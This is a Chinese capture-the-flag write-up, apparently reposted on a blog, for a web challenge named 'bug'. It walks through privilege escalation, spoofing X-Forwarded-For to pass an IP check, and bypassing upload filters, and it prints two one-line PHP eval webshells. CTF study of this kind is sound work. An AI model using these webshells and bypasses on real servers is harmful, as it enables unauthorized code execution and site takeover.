当前位置:   article > 正文

【攻防世界】bug

【攻防世界】bug

垂直越权+IP绕过+文件上传

垂直越权

IP绕过

bp抓包,添加请求头X-Forwarded-For:127.0.0.1

 文件上传

文件上传绕过

1. mime检测(Content-Type)
2. 大小写绕过
3. 等价替换(php5,php3)
4. 利用JavaScript执行php代码(正常的php代码会被检测到,所以就用JavaScript来执行)

<script language='php'>....</script>

上传一个1.php 文件,出现弹窗。说明有前端校验(JavaScript),过滤了.php文件。

改后缀为.png 图片,显示

说明它不光检测后缀,还检测了内容

上传一个真的图片,显示

 绕过前端js验证:

(1)使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell

(2)首把webshell的后缀改成允许上传的‘.jpg’、‘.png’、‘.gif’ 绕过JS检测。再抓包把后缀名改成.php,即可上传webshell

抓包修改后缀为 “php5”,Content-Type 为 “image/jpeg”,并在 post 数据中将 PHP 一句话木马改为用 JavaScript 表示。

一句话木马 

如果过滤了<?php ?> 就用<script language='php'> </script>

  1. <?php eval($_POST['a']) ?>
  2. <script language='php'> @eval($_POST['a']) </script>

 https://www.cnblogs.com/linfangnan/p/13591331.html

【愚公系列】2023年06月 攻防世界-Web(bug)_攻防世界bug-CSDN博客

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/448678?site
推荐阅读
相关标签
  

闽ICP备14008679号